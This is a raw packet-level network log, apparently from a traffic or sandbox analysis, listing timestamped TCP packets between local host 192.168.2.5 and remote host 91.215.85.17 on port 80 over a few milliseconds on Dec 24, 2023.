Dec 24, 2023 10:44:21.164843082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.164880991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.164917946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165011883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165050983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.165110111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165186882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165256023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165299892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.165354967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165445089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165487051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.165514946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165553093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.165611029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165674925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165714979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.165864944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.165966988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166007996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166047096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166127920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166188955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166227102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166270971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166358948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166399002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166418076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166455984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166481018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166579008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166668892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166704893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166742086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166837931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166877985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166903973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.166939020 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.166951895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167023897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167063951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167078018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167139053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167176962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167232037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167304993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167393923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167432070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167457104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167540073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167592049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167615891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167653084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167700052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167768002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167809010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167825937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167874098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167922974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.167943954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.167987108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168044090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168076992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168083906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168113947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168164968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168240070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168282032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168359041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168451071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168493986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168521881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168617964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168674946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168714046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168746948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168808937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168822050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.168848038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168859959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.168982983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169079065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169156075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169198036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169222116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169323921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169365883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169389009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169425964 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169450998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169528008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169567108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169591904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169683933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169701099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169724941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169790030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169828892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.169864893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169949055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.169987917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170051098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170123100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170167923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170191050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170243979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170330048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170371056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170371056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170423985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170464039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170514107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170577049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170619965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170663118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170717001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170720100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170783043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170830011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.170888901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.170967102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171010017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171051979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171144962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171205997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171246052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171287060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171317101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171356916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171382904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171417952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171452999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171509981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171551943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171607018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171699047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171745062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.171780109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171838045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171941996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.171981096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172035933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172101021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172144890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172158003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172190905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172202110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172252893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172291994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172318935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172365904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172405005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172441006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172528028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172610998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172646999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172683954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172760963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172801971 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172825098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172888041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172929049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.172951937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172965050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.172995090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173029900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173069954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173099995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173154116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173194885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173233032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173335075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173408031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173444986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173485994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173538923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173579931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173639059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173713923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173748970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173752069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173788071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173791885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173840046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173880100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.173897982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.173973083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174014091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174045086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174088955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174124956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174165010 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174195051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174299955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174345970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174365044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174401045 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174431086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174505949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174555063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174592972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174663067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174700975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174720049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174751043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174793005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.174818993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174869061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174932957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.174973965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175009966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175107002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175144911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175170898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175271034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175311089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175324917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175362110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175431967 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175515890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175558090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175585032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175647974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175689936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175714016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175776005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175831079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175870895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.175905943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.175997972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176038027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176084995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176125050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176150084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176291943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176330090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176366091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176425934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176471949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176486015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176580906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176676989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176717043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176765919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176841021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176881075 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.176911116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.176951885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177006006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177088976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177133083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177158117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177205086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177246094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177270889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177331924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177396059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177436113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177460909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177509069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177546978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177607059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177645922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177675009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177761078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177800894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.177839041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177951097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.177989960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178020000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178095102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178136110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178172112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178220987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178282022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178323984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178359032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178446054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178486109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178567886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178606033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178658962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178734064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178771973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178807974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178891897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.178932905 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.178957939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179413080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179512024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179554939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.179580927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179661989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179702997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.179728985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179769993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.179795980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179866076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.179905891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180007935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180088997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180128098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180157900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180264950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180341959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180382013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180447102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180538893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180581093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180617094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180653095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180690050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180807114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180847883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180866003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180907011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.180946112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.180994034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181056023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181159973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181200027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181240082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181315899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181370974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181391001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181430101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181456089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181554079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181592941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181662083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181744099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181785107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181797981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181860924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181917906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.181961060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.181999922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.182112932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.182152033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.182166100 CET	80	49716	91.215.85.17	192.168.2.5
